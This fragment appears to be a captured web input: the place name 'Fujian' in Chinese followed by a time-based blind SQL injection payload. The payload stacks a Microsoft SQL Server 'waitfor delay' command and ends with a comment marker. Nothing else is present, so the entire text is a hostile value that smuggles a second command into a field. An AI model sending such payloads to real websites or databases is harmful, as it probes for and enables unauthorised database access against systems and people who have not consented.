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福建-1; waitfor delay '0:0:15' -- 3137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